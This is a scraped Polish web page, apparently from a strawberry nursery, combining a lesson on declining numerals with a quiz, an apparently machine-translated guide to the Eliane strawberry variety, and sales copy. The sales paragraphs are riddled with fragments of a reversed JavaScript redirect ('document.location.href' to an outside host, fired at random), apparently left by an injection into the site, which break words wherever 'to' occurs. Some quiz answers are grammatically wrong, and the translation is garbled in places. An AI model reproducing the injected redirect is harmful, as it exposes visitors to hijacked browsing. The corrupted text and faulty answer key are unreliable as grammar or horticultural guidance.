Press "Enter" to skip to content

Truskawki Eliane

Wszystkie oferowane przez nas sadzonki posiadają Świadectwo Kwalifikacji wystawione przez Państwową Inspekcję Ochrony Roślin i Nasiennictwa. Instytucja ta, jako jedyna w kraju, nadzoruje jakość materiału nasadzeniowego i nasiennego. Stawiane przez nią wymagania są wysokie, za tobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) to wystawione przez PIORiN paszporty honorowane na terenie całej Unii Europejskiej.

Odmiana liczebników

Liczebniki to wyrazy oznaczające ilość lub kolejność osób, zwierząt czy rzeczy, np. pierwszy maja, dwa samochody, trzeci dom, dwadzieścia złotych, pięćdziesiąt osiem tysięcy sto trzydzieści siedem sadzonek.

Liczebniki – podział

 • Główne, np. dwa, osiem ,tysiąc osiemset dwadzieścia jeden .
 • Porządkowe, które oznaczają kolejność, np. dwudziestyósmy , trzydziesty piąty , czwarty .
 • Zbiorowe, które oznaczają ilość elementów w danym zbiorze; np. dwoje, troje, pięcioro.
 • Ułamkowe, np. ćwierć, półtora , trzy czwarte .

Liczebników zbiorowych używamy:

 • w połączeniu z rzeczownikami oznaczającymi osoby różnej płci, np. dwoje rodziców, czworo ludzi ;
 • przy rzeczownikach oznaczających istoty niedorosłe, np. pięcioro kurcząt , dwoje dzieci ;
 • przy rzeczownikach, które nie mają liczby pojedynczej, np. dwoje drzwi, pięcioro sań .

Zbiorowe szaleństwo z liczebnikami zbiorowymi

Co powiesz o zdaniu: Dwa urocze dziewczęta postanowiły wybrać się na zakupy?
Intuicyjnie czujemy, że coś tu jest nie tak. Ale co? To rzeczownik dziewczę płata nam figla. Według zasad gramatycznych – jest rodzaju nijakiego (to dziewczę), natomiast z punktu widzenia biologicznego – niewątpliwie żeńskiego. I dlatego w przytoczonym zdaniu łatwo popełnić błąd, mówiąc dwa/dwie dziewczęta, sugerujemy się tym, że powiedzielibyśmy dwie dziewczyny.
Nie ma tak łatwo, a przytoczone zdanie nie jest poprawne. „Słownik poprawnej polszczyzny” wymaga, byśmy mówili dwoje dziewcząt (nie dwie ani dwa dziewczęta!).

Mówimy więc: Dwoje dziewcząt postanowiło wybrać się na zakupy.
Wtedy, gdy są trzy lub jest ich jeszcze więcej, autorzy słownika są bardziej tolerancyjni. Można mówić troje, czworo, pięcioro dziewcząt lub trzy, cztery dziewczęta, pięć dziewcząt .

Pora prześledzić dokładniej, jak odmieniają się liczebniki tego typu:

M. dwoje, czworo (dzieci, kociąt, kurcząt)
D. dwojga, czworga (dzieci, kociąt, kurcząt)
C. dwojgu, czworgu (dzieciom, kociętom, kurczętom)
B. dwoje, czworo (dzieci, kociąt, kurcząt)
N. dwojgiem, czworgiem (dzieci, kociąt, kurcząt)
Msc. dwojgu, czworgu (dzieciach, kociętach, kurczętach)

Jest jednak pewne pocieszenie. Liczebników zbiorowych typu dwoje, troje, czworo… używa się stosunkowo rzadko. Być może właśnie dlatego, że wymagają one odrębnej, niełatwej odmiany i specjalnych połączeń z innymi wyrazami w zdaniu. Sprawiają więc wiele kłopotu w potocznym języku.
Co do istot niedorosłych, takich jak kocię, pisklę, szczenię, jagnię, prosię, mówimy o nich zgodnie z tradycyjnymi zasadami gramatyki:

Urodziło się dwoje (troje, czworo…) kociąt, szczeniąt, prosiąt.
Szukamy mleka dla dwojga szczeniąt.
Przyniosłem pokarm trojgu kociętom.

Liczebniki porządkowe

Liczebniki porządkowe odmieniają się przez przypadki, liczby i rodzaje, czyli zachowują się dokładnie tak jak przymiotniki.

Pierwszy – odmienia się jak pieszy

M. pierwszy (pieszy)
D. pierwszego (pieszego)
C. pierwszemu (pieszemu)
B. pierwszego (pieszego)
N. pierwszym (pieszym)
Msc. pierwszym (pieszym)

Drugi – jak długi
(drugi, drugiego, drugiemu, drugiego…)

Przypomnij sobie, jak odmieniają się przymiotniki. Skoro liczebniki porządkowe odmieniają się jak one, to:

 • mają trzy różne formy w liczbie pojedynczej:
  – inną dla rodzaju męskiego – pierwszy (pierwszy biegacz),
  – inną dla żeńskiego – pierwsza (pierwsza dama),
  – inną dla nijakiego – pierwsze (pierwsze skrzypce)
 • dwie w liczbie mnogiej:
  – męskoosobową – pierwsi mężczyźni
  – niemęskoosobową – pierwsze koty (za płoty)

W liczebnikach porządkowych wielowyrazowych: dwudziesty trzeci, siedemdziesiąty piąty, tysiąc dziewięćset osiemdziesiąty szósty, odmieniają się tylko te człony, które oznaczają jednostki i dziesiątki. Pozostałe człony traktujemy jako liczebniki główne i nie odmieniamy ich.

 • Od roku tysiąc dziewięćset dziewięćdziesiątego ósmego rozpoczęła się moja przygoda z żeglarstwem.
 • W tysiąc osiemset sześćdziesiątym trzecim wybuchło powstanie styczniowe.
 • Wreszcie miałem czas, by zająć się tymi sześćdziesięcioma sadzonkami.

Podstawa to liczebniki główne

One także nie odmieniają się w sposób jednakowy.

Liczebnik JEDEN odmienia się tak jak przymiotnik.

 • W liczbie pojedynczej ma formy rodzaju
  • męskiego ( jeden )
  • żeńskiego ( jedna )
  • nijakiego (jedno)
  • w liczbie mnogiej formy
   • męskoosobowe (jedni)
   • niemęskoosobowe (jedne)

   Jeden chłopak, jedna dziewczyna i jedno dziecko zjedli po jednym ciastku, jednym bananie i jednej śliwce.

   Liczebnik DWA występuje w trzech formach rodzajowych:

   • męskoosobowej (pamiętaj: rodzaj męskoosobowy: osoby płci męskiej)
    Na boisku stoją dwaj uczniowie.
    W okolicach sklepu widziałam dwóch chłopaków.
    Z uwagą przyglądał się tym dwóm mężczyznom.
   • żeńskiej
    Dwie uczennice reprezentowały naszą szkołę na zawodach.
    Tym dwóm dziewczynom to się poszczęściło!
    Porozmawiajmy o dwóch ważnych sprawach.
   • razem w: niemęskoosobowej i nijakiej
    Dwa konie są faworytami w tym wyścigu.
    Nie sądzę, by były Ci potrzebne dwa jednakowe kubki.

   Można i tak, i tak

   W narzędniku liczebnik dwa połączony z rzeczownikiem w rodzaju żeńskim czasami przybiera formę dwiema.
   Przy rzeczownikach w rodzaju męskim połączonych z liczebnikiem dwa, możemy wymiennie używać form dwaj i dwóch.
   Dwaj chłopcy poszli na boisko.
   lub
   Dwóch chłopców poszło na boisko.

   Podsumujmy:

   Rodzaj Rodzaj Rodzaj
   męskoosobowy niemęskoosobowy i nijaki żeński
   M. dwaj uczniowie M. dwa stoły M. dwie myszki
   D. dwóch uczniów D. dwóch stołów D. dwóch myszek
   C. dwóm uczniom C. dwóm stołom C. dwóm myszkom
   B. dwóch uczniów B. dwa stoły B. dwie myszki
   N. dwoma uczniami N. dwoma stołami N. dwiema myszkami
   Msc. dwóch uczniach Msc. dwóch stołach Msc. dwóch myszkach

   Pora powiedzieć: trzy

   Liczebniki od „trzech” do „dziewięciuset” mają dwie formy:

   • męskoosobową (trzej: mężczyźni, uczniowie, studenci),
   • niemęskoosobową (trzy: okna, stodoły, kobieta).

   Zobacz, jak wygląda ich odmiana:

   Forma męskoosobowa Forma niemęskoosobowa

   M. trzej studenci (albo trzech studentów) trzy okna
   D. trzech studentów trzech okien
   C. trzem studentom trzem oknom
   B. trzech studentów trzy okna
   N. trzema studentami trzema oknami
   Msc. trzech studentach trzech oknach

   Zauważ, że według takiego samego schematu odmienia się liczebnik „cztery”.

   • Czterech uczniów z naszej klasy będzie grało w międzyszkolnych rozgrywkach koszykówki.
   • Zobaczyłem czterech uczniów i biegnące obok nich cztery rasowe psy.

   Liczymy dalej…

   Liczebniki od „pięciu” do „dzięwięciuset” także mają dwie formy: męskoosobową i niemęskoosobową. I również mają odmienne formy w mianowniku i bierniku.

   Forma męskoosobowa

   M. pięciu, dwustu studentów; pięć, dwieście stołów
   D. pięciu, dwustu (dwóchset) studentów
   C. pięciu, dwustu studentom
   B. pięciu, dwustu studentów
   N. pięcioma (pięciu), dwustoma (dwustu) studentami
   Msc. pięciu, stu studentach

   Forma niemęskoosobowa

   M. pięć, dwieście, okien
   D. pięciu, dwustu okien
   C. pięciu, dwustu oknom
   B. pięć, sto, dwieście okien
   N. pięcioma, dwustoma oknami
   Msc. pięciu, stu oknach

   Dziwić może podwójna forma w dopełniaczu i narzędniku? Warto wiedzieć, że:

   • Liczebniki dwieście, trzysta, czterysta mogą mieć w dopełniaczu nie tylko formę dwustu, trzystu, czterystu, ale i trochę przestarzałe (ale nadal poprawne!) formy dwóchset, trzechset, czterechset.
   • Liczebniki od pięciu do dziewięćdziesięciu w narzędniku wszystkich rodzajów przybierają końcówki -oma lub-u, np. pięcioma (albo pięciu) krajami, trzydziestoma (albo trzydziestu) tomami. Form z -u używa się głównie w połączeniu z rzeczownikami.

   Setki, dziesiątki, jedności…

   • Jeżeli liczebnik składa się z dwóch wyrazów, to każdy z tych wyrazów odmienia się przez rodzaje i przypadki, przybierając oczywiście odpowiednie końcówki.
    (widzę) dwudziestu dwóch uczniów
    (kupiłem) trzydzieści siedem tomów
    (opowiadałem o) czterdziestu ośmiu stołach
    (brakuje) pięćdziesięciu sześciu biletów
   • Gdy liczebnik składa się z trzech wyrazów, człony oznaczające setki w narzędniku nie przyjmują końcówki-oma, np.:
    Samolot ze stu dwudziestu pięcioma osobami na pokładzie (ewentualnie: stu dwudziestoma pięcioma , a nie: stoma)
   • Jeżeli liczebnik składa się z więcej niż trzech wyrazów, można odmieniać albo wszystkie jego składniki, albo tylko dziesiątki i jednostki.
    Zdałem do tej szkoły razem z tysiącem pięciuset dwudziestu (lub: dwudziestoma ) pięcioma (albo tysiąc pięćset dwudziestu pięcioma ) innymi chłopakami.
    Wydano indeksy tysiąc trzysta pięćdziesięciu ośmiu (albo tysiącu trzystu pięćdziesięciu ośmiu ) studentom.
    Wyjątek od tej reguły stanowią liczebniki z końcówką „jeden”, która pozostaje nieodmienna, np.
    Sklep z tysiącem jeden drobiazgów.
   • Liczebniki: tysiąc, milion, miliard mają odmianę rzeczownikową, jak np. miesiąc, ogon, bilard.

   Ważny zbiór liczebników zbiorowych

   Ponieważ człowiek jest istotą stadną, wydawałoby się, że liczebniki zbiorowe powinny odgrywać bardzo ważną rolę w naszym języku. Ale, co dziwne, mimo że odmieniają się one w sposób nieskomplikowany, formy liczebników zbiorowych nie są zbyt często używane.
   Kombinujemy: zamiast troje nożyczek mówimy trzy pary nożyczek, zamiast trzydzieścioro uczniów używamy konstrukcji dwudziestu uczniów i dziesięć uczennic.

   W praktycznym użyciu są jedynie formy liczebników o mniejszych wartościach liczbowych – dwoje, troje, ośmioro. Odmieniają się one jak rzeczowniki w rodzaju nijakim. Porównaj odmiany rzeczownika wiadro i liczebnika pięcioro:

   M. wiadro pięcioro dzieci, kociąt, drzwi
   D. wiadra pięciorga dzieci, kociąt, drzwi
   C. wiadru pięciorgu dzieciom, kociętom, drzwiom
   B. wiadro pięcioro dzieci, kociąt, drzwi
   N. wiadrem pięciorgiem dzieci, kociąt, drzwi
   Msc. wiadrze pięciorgu dzieciach, kociętach, drzwiach

   Liczebnik rzadko samotny

   Na pytanie kolegi: O której masz być w domu? można odpowiedzieć krótko: O jedenastej. Często sytuacja wymaga, by odpowiedzieć w sposób pełniejszy. Pełniejszy, a więc w połączeniu z innymi wyrazami. Warto więc przyjrzeć się, jak liczebniki zachowują się w towarzystwie rzeczowników…

   Pierwszego dnia pobytu, dokładnie o godzinie pierwszej złamałem rękę.
   Liczebniki zgadzają się pod względem rodzaju, liczby i przypadka z określanymi rzeczownikami.

   Dwie dziewczyny zobaczyły trzech chłopców przebiegających przez ulicę.
   Zaprzyjaźniłam się z dwoma (dwiema) dziewczynami z klasy.
   Cztery kociaki szybko wyjadały suchą karmę z jednej miseczki.

   Liczebniki dwa, trzy, cztery, zgadzają się z określanymi rzeczownikami pod względem rodzaju i przypadka.

   Tysiąc uczniów w całej Polsce nie zdało matury.
   Tysiącowi studentów przyznano stypendia naukowe.
   Liczebniki tysiąc, miliard – zawsze łączą się z rzeczownikiem w formie dopełniacza.

   Na zakończenie mały test

   1. Na oddziale intensywnej terapii leżało (25) pacjentów.
   2. Szkolna biblioteka dysponuje (3000) książek, z czego (1138) jest wypożyczonych.
   3. (4) kociąt uganiało się za kłębkiem wełny, a (5) kurcząt dziobało ziarno.
   4. W szpitalu znalazło się (23) chłopców, (8) dziewcząt i (2) niemowląt chorych na żółtaczkę.
   5. Razem ze (121) innymi dziewczynami dostałam się do renomowanego liceum.
   6. Czy naprawdę wydaje Ci się, że o tych (35) błędach w dyktandzie nie warto wspominać?
   7. Przecież to postać z „Księgi (1001) nocy”!
   8. (2) drzwi stało otworem.
   9. W tym zakładzie będzie pracowało (500) robotników.
   10. Nie mów o (100) rzeczach naraz!
   11. Zobaczyłam Agnieszkę z (2) książkami pod pachą.
   12. W tej kolejce jestem dopiero (1821).
   13. Za początek romantyzmu przyjmuje się rok (1822).
   14. W przedszkolu znajdowało się (121) dzieci.

   Odpowiedzi:

   1. Na oddziale intensywnej terapii leżało dwadzieścioro pięcioro pacjentów.
   2. Szkolna biblioteka dysponuje trzema tysiącami książek, z czego tysiąc sto trzydzieści osiem jest wypożyczonych.
   3. Czworo kociąt uganiało się za kłębkiem wełny, a pięcioro kurcząt dziobało ziarno.
   4. W szpitalu znalazło się dwudziestu trzech chłopców, osiem dziewcząt i dwoje niemowląt chorych na żółtaczkę.
   5. Razem ze stu dwudziestoma jeden (lub sto dwudziestoma jeden) innymi dziewczynami dostałam się do renomowanego liceum.
   6. Czy naprawdę wydaje Ci się, że o tych trzydziestu pięciu błędach w dyktandzie nie warto wspominać?
   7. Przecież to postać z „Księgi tysiąca i jednej nocy”!
   8. Dwoje drzwi stało otworem.
   9. W tym zakładzie będzie pracowało pięciuset robotników.
   10. Nie mów o stu rzeczach naraz!
   11. Zobaczyłam Agnieszkę z dwiema książkami pod pachą.
   12. W tej kolejce jestem dopiero tysiąc osiemset dwudziesty pierwszy.
   13. Za początek romantyzmu przyjmuje się rok tysiąc osiemset dwudziesty drugi.
   14. W przedszkolu znajdowało się sto dwadzieścioro jeden dzieci.

   Zobacz:

   Truskawki Eliane

   Holenderskie odmiany truskawek są cenione ze względu na wysoki plon i jakość owoców. Wiele zagranicznych hybryd z powodzeniem rośnie w rosyjskim klimacie. Truskawka Eliane nie była wyjątkiem. Wyróżnia się wczesnym dojrzewaniem, niezwykłym smakiem i prezentacją owoców. Poniżej znajduje się opis odmiany truskawek Eliane, zdjęcia i recenzje.

   Opis truskawek Eliane

   Eliane truskawka to hybryda wyprodukowana w 1998 roku. Pomysłodawcą jest Vissers Aardbeiplanten BV Odmiana polecana do uprawy w prywatnych i małych gospodarstwach. W Rosji sadzi się go w regionach południowych, Syberii i środkowym pasie.

   Ta odmiana truskawek występuje pod nazwą Eliani frigo. Technologia Frigo pozwala na wykorzystanie sadzonek o każdej porze roku do ciągłej uprawy. Korzenie sadzonek umieszcza się w plastikowych torebkach i przechowuje w chłodnych warunkach. Sadzonki zebrane metodą frigo zachowują żywotność przez 3 lata.

   Charakterystyka odmiany Eliane:

   • wysoki, potężny krzew;
   • średnia skłonność do tworzenia wąsów;
   • duże błyszczące jasnozielone liście;
   • często płyta przybiera kształt łodzi;
   • szypułki są mocne, wyprostowane i opadają na ziemię pod ciężarem jagód.

   Jagody są jednolite, regularne w kształcie stożka. Działka jest podniesiona, szyja krótka. Owoc ma jasnoczerwoną, gęstą i błyszczącą skórkę. Dojrzała truskawka nie ciemnieje, tylko nieznacznie zmienia kolor od działki do wierzchołka. Niełupki są żółte, położone na powierzchni.

   Truskawki Eliane na zdjęciu:

   Miąższ jagód jest jasnoczerwony, lekko gęsty, soczysty i delikatny. Aromat jest wyraźny, z nutami truskawkowymi i owocowymi. W smaku niezwykłe, wielopłaszczyznowe, przypominające truskawki i brzoskwinie. Uprawa jest używana świeża i mrożona, a także do robienia dżemu i innych przetworów.

   Uwaga! Truskawki Eliane najlepiej rosną w łagodnym klimacie.

   Hybryda ma niską tolerancję na suszę. W przypadku braku wilgoci pojawia się mniej jajników, pogarsza się smak i wielkość jagód. W upale jagody są często pieczone. Nadmiar wilgoci niekorzystnie wpływa na jakość owoców: stają się wodniste w smaku.

   Zimotrwalosc odmiany Eliane oceniana jest jako wysoka. Bez schronienia krzewy tolerują spadek temperatury do -15 ° C. W obecności pokrywy śnieżnej i dodatkowej izolacji rośliny przeżywają bardziej dotkliwe mrozy.

   Plusy i minusy odmiany truskawek Eliane

   Odmiana Eliane zyskała popularność dzięki swoim zaletom:

   • stan rynkowy;
   • dobry gust;
   • wczesne dojrzewanie;
   • przedłużone owocowanie;
   • wysoka odporność na choroby.

   Przy wyborze truskawki odmiany Eliane brane są pod uwagę jej wady:

   • niska odporność na suszę, wymagane podlewanie;
   • przy obfitych opadach smak owocu zostaje utracony;
   • nie toleruje ekstremalnych warunków pogodowych;
   • nie nadaje się do uprawy przemysłowej;
   • średnia zdolność transportowa.

   Sadzenie i pielęgnacja truskawek Eliane

   W celu udanej uprawy truskawek Eliane ważne jest przestrzeganie kilku niuansów. Najpierw wybiera się odpowiednie miejsce do sadzenia, a następnie przygotowuje się rośliny. Kultura w okresie wegetacji wymaga stałej opieki.

   Wybór i przygotowanie miejsca lądowania

   Truskawki Eliane kwitną na słonecznych obszarach, które nie są narażone na silne wiatry. Kultura potrzebuje gleby bogatej w materię organiczną. Do sadzenia nadaje się gliniasta, piaszczysto-gliniasta, szara gleba leśna, czarnoziemska. Przy nadmiarze gliny zaleca się dodanie do gleby kompostu i piasku rzecznego.

   Truskawki sadzi się na obszarze, na którym wcześniej rosły zboża, petunie, czosnek, cebula, nagietki i zioła. Krzewy powinny leżeć na jednym łóżku przez 3-4 lata, a następnie zmienia się miejsce sadzenia. Dopuszcza się powrót truskawek na ich pierwotne miejsce po 2 latach.

   Witryna dla kultury jest przygotowywana z wyprzedzeniem. Jesienią ziemię wykopuje się na głębokość 20-30 cm. m zrobić 8 kg próchnicy, 120 g superfosfatu i 40 g siarczanu potasu.

   Przygotowanie materiału do sadzenia

   Do sadzenia wybiera się mocne, zdrowe sadzonki odmiany Eliane. Najlepiej wybierać sadzonki o 3-5 liściach i rozwiniętych korzeniach o długości co najmniej 5 cm, krzewy wydłużone, przerośnięte i słabe należy porzucić.

   Przed zejściem na ląd trzymane są w chłodnym miejscu przez 3 dni. Następnie korzenie truskawki zanurza się w czystej wodzie, w której dodaje się stymulant rogówki. Pozostawia drzewko z 3-4 liśćmi i uszczypnij najdłuższy korzeń.

   Zasady lądowania

   Czas jest ważny dla pomyślnego sadzenia truskawek Eliane. Prace trwają jesienią od połowy sierpnia do września. Przed nadejściem chłodów sadzonki będą miały czas na zakorzenienie się na miejscu.

   Rada! Wiosenne sadzenie truskawek Eliane jest dozwolone, gdy topnieje śnieg, a gleba dobrze się nagrzewa.

   Kolejność sadzenia truskawek odmiany Eliane:

   1. Glebę rozluźnia się widłami.
   2. W ogrodzie dołki do sadzenia o średnicy 30 cm wykonuje się na głębokość 15 – 20 cm.
   3. Pozostaw co najmniej 30 cm między roślinami.
   4. Do dołka wlewa się wodę, następnie umieszcza sadzonkę, a jej korzenie przykrywa się ziemią.
   5. Gleba jest zagęszczona i ściółkowana humusem.

   W pierwszych dniach po posadzeniu truskawek nie podlewa się ani nie karmi. Rośliny przystosowują się do nowych warunków w 10 – 14 dni. Jeśli powstanie ciepło, krzaki są pokryte papierowymi czapkami.

   Podlewanie i karmienie

   Zgodnie z opisem odmiany, zdjęciami i recenzjami ogrodników, truskawki Eliane są wrażliwe na brak wilgoci. Regularne podlewanie rozpoczyna się pod koniec kwietnia. Każda roślina potrzebuje 2-3 litrów wody. W umiarkowanym upale wilgoć nakłada się co 10 dni; w przypadku suszy truskawki podlewamy do 4 razy w tygodniu. Do podlewania najlepiej wybrać godziny poranne lub wieczorne. Woda wlewa się ściśle pod korzeń, nie dopuszczaj do jej kontaktu z pędami i liśćmi.

   Top dressing odmiany Eliane odbywa się zgodnie ze schematem:

   • w kwietniu – napar dziewanny;
   • podczas kwitnienia – roztwór azotanu potasu w ilości 15 g na 5 litrów wody;
   • po zbiorach – superfosfat osadzony w glebie.

   Truskawki pozytywnie reagują na dokarmianie dolistne. Na 10 litrów wody dodaj 2 g nadmanganianu potasu i kwas borowy. Krzewy opryskuje się przy pochmurnej pogodzie lub wieczorem. Sadzonki są przetwarzane podczas kwitnienia i owocowania.

   Ściółkowanie i spulchnianie

   Aby dłużej utrzymać wilgoć w glebie, na łóżka wylewa się słomę lub humus. Warstwa ściółki wynosi 5 – 7 cm, okresowo poluzować glebę pod truskawkami. Dzięki temu rośliny lepiej wchłaniają wilgoć i składniki odżywcze. Co 1-2 tygodnie poluzowują glebę między krzakami truskawek, starając się zapobiec tworzeniu się skórki.

   Przygotowanie do zimy

   Odpowiednie przygotowanie do zimy pomoże truskawkom Eliane przetrwać zimę. Rośliny okryte igliwiem, słomą, kompostem, humusem. Najlepiej jest założyć schronienie tuż przed zimnem. Dodatkowo zimą nad łóżka obrzucana jest zaspa śnieżna.

   Film o uprawie truskawek Eliane w szklarni:

   Żniwny

   Odmiana Eliane jest zbierana w połowie wczesnego okresu. Zwykle jest to koniec maja lub początek czerwca. Podczas długiego, ciepłego lata hybryda wykazuje zdolność do naprawy. Bliżej jesieni krzewy wypuszczają nowe łodygi kwiatowe i plonują przed nadejściem chłodów.

   Z jednego krzewu odmiany Eliane zbiera się od 1 do 2 kg jagód. Plon jest gorszy od Elsante i innych odmian referencyjnych. Wskaźnik ten zależy od warunków atmosferycznych, wyboru dobrego miejsca na truskawki, przestrzegania technologii rolniczej. Zbiory są usuwane w ciągu miesiąca. Pierwsze jagody są największe, ich wielkość stopniowo maleje.

   Reprodukcja

   Do rozmnażania truskawek Elaine stosuje jedną z następujących metod:

   1. Z wąsami. Materiał do sadzenia wybiera się z najpotężniejszych krzewów – nie starszych niż 2 lata. Duże rozety przesadza się do małej doniczki. Reszta wąsów jest usuwana. W środku lata rozety są oddzielane od rośliny matecznej i sadzone w rabacie ogrodowym.
   2. Dzieląc krzew. Ta metoda rozmnażania jest odpowiednia dla dojrzałych krzewów z rozwiniętymi korzeniami. Wiosną lub jesienią wykop truskawki i podziel każdy krzew na 2 – 3 części. Sadzonka musi mieć korzenie i liście. Powstałe części są osadzone na miejscu.
   3. Posiew. Najbardziej czasochłonna metoda hodowli odmiany Eliane. Materiał do sadzenia pozyskuje się z dojrzałych jagód lub kupuje w sklepie. W lutym nasiona sadzi się w pojemnikach z żyzną glebą. Sadzonki są pod stałą opieką: podlewane, chronione przed zimnem, włączane podświetlenie. W maju-czerwcu, kiedy mijają mrozy, sadzi się truskawki w ziemi.

   Choroby i szkodniki

   Truskawki Eliane są odporne na większość chorób upraw. Najczęściej nasadzenia cierpią na choroby grzybowe: mączniak prawdziwy, brązowo-biała plama, fusarium. Aby zwalczać choroby, ważne jest przestrzeganie płodozmianu, podlewanie pokarmowe i prowadzenie profilaktyki. Jesienią odcina się suszone liście. Każdej wiosny rośliny spryskuje się roztworem Quadris.

   Rada! W okresie wegetacji stosuje się naturalne środki: napar z czosnku lub piołunu.

   Truskawki przyciągają chrząszcze liściowe, kleszcze, ryjkowce, ślimaki i inne owady. Spark, Actellik i inne są używane przeciwko szkodnikom, opryski rozpoczynają się wczesną wiosną. Ryzyko pojawienia się owadów zmniejsza się dzięki przestrzeganiu technik rolniczych: przycinaniu pędów, kontrolowaniu wilgotności gleby, kopaniu grządek jesienią.

   Wniosek

   Opis odmiany truskawek Eliane, zdjęcia i recenzje pomogą ogrodnikom dowiedzieć się więcej o hybrydzie. Wysoki plon zapewni wybór lokalizacji na stanowisku, przygotowanie sadzonek i gleby. Truskawki wymagają stałej pielęgnacji w okresie wegetacji. Odmiana Eliane rozmnaża się przez podzielenie buszu lub użycie wąsów.

   Recenzje o truskawce Eliane

   Babakov Evgeny Petrovich, 43 lata, truskawka Tomska Eliane to doskonała odmiana, przez cały czas nigdy nie czytałem na jej temat negatywnych recenzji. Hybryda pochodzi z Holandii, ale dobrze zakorzeniła się w naszych syberyjskich warunkach. Krzewy są mocne i zdrowe. Owocnikowanie jest wydłużone, co może być niekorzystne dla niektórych ogrodników. Jagody są jasne, raczej pomarańczowe. Smakują bardzo słodko i soczyście. Większość owoców ma prawidłowy kształt, ma prezentację. Do uprawy przemysłowej odmiana Eliane nie jest odpowiednia. Uprawa nie wytrzymuje długiego transportu. Osinkina Alla Ivanovna, 34 lata, Niżny Nowogród Do sadzenia w kraju wybieramy najsmaczniejsze odmiany truskawek. Najnowszą nowością na stronie jest holenderska hybryda Eliane. Jagody są duże i słodkie, łatwo oddzielają się od działek. Smak jest bardzo nietypowy, przypominający brzoskwinię. Pierwsza fala to największe owoce,potem trochę się kurczą. Liście są mocne, lekko zawinięte do wewnątrz jak łódź. Pod względem plonu ustępuje innym mieszańcom, ale jagody można zbierać przez kilka tygodni. Krzewy dobrze znosiły zimę, nawet przy niewielkim śniegu. Odmiana Eliane ma wiele wąsów, można je bez problemu rozmnażać.

   Sadzonki Truskawek

   Nasza firma od samego początku kieruje się jedną, ważną zasadą – wystrzegamy się jak ognia sprzedaży sadzonek niekwalifikowanych, które mogą być zainfekowane są najróżniejszymi, groźnymi patobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) togenami. Stawiamy na zaufanie i na zadowolenie naszych Klientów, dlatego ze szczególną starannością dbamy o jakość naszego asortymentu i otobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) to, by wydane przez Państwa pieniądze zostały dobrze zainwestobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) towane. Ponadtobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) to, wychodząc naprzeciw oczekiwaniom Klientów, staramy się zapewnić atrakcyjne ceny.

   Wszystkie oferowane przez nas sadzonki posiadają Świadectwo Kwalifikacji wystawione przez Państwową Inspekcję Ochrony Roślin i Nasiennictwa. Instytucja ta, jako jedyna w kraju, nadzoruje jakość materiału nasadzeniowego i nasiennego. Stawiane przez nią wymagania są wysokie, za tobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) to wystawione przez PIORiN paszporty honorowane na terenie całej Unii Europejskiej.

   Zadzwoń i zarezerwuj najlepsze odmiany dla siebie!
   +48 731 410 390
   Jesteśmy dostępni 24/7, również w niedzielę

   Odmiany sadzonek truskawek

   CZYM SIĘ KIEROWAĆ PRZY WYBORZE ODMIAN TRUSKAWEK?

   Na świecie uprawia się tysiące odmian truskawek, w Polsce – kilkadziesiąt. Dlaczego aż tyle? To proste: nie istnieje jedna doskonała odmiana, tj. łącząca w sobie same zalety i zupełnie pozbawiona wad. Każda odmiana truskawek, bez wyjątku, ma swoje plusy i minusy. Jeżeli dana odmiana odznacza się, przykładowo, doskonałym smakiem, wysoką plennością i trwałością pozbiorczą, tobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) to częstobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) to można mieć szereg zastrzeżeń np. co do jej zimotrwałości i braku odporności na niektóre choroby. Poza tym poszczególne odmiany owocują w różnych terminach. Ktobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) to odpowie, która jest lepsza, wczesna czy późna?

   Dlatego wybór odpowiednich odmian nie jest prostą sprawą. Wszystko zależy od naszych preferencji. Jeżeli np. lubimy smażyć konfitury albo gotobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) tować kompoty, tobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) to powinniśmy posadzić starą, sprawdzoną odmianę Senga Sengana, która pod względem parametrów przetwórczych nie ma sobie równych (bardzo słodka i aromatyczna, ciemna w przekroju, łatwo się odszypułkowuje, jest plenna, dobrze się udaje na lekkich glebach piaszczystych, nie boi się mrozów itd.). Jeżeli nie interesują nas przetwory, tylko smak i uroda owoców tobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) to radzimy uprawę którychś z odmian deserowych np. Honeoye, Polka czy Korona będące standardami zaaklimatyzowanymi do warunków naszego kraju, lub postawić na jakieś nowości rodem z innych, cieplejszych niż Polska krajów.

   My, profesjonalni plantatobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) torzy, którzy żyjemy z uprawy truskawek, nie lubimy ryzyka. Wychodzimy z założenia, że najbezpieczniej jest sadzić odmiany, co do których mamy przekonanie, że przezimują w naszych warunkach bez większych strat. Jednak tutaj musimy oddzielić dwie kwestie: o ile profesjonaliści sadząc rozmaite kalifornijskie, włoskie czy południowo hiszpańskie „wynalazki” ryzykują wiele (hektary, setki tysięcy sadzonek), o tyle amatobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) torzy, sadząc nie więcej niż kilkanaście bądź kilkadziesiąt sadzonek danej odmiany, niekoniecznie. Ktobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) toś przecież musi przetestobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) tować nowe odmiany w sensie ich zimotrwałości.

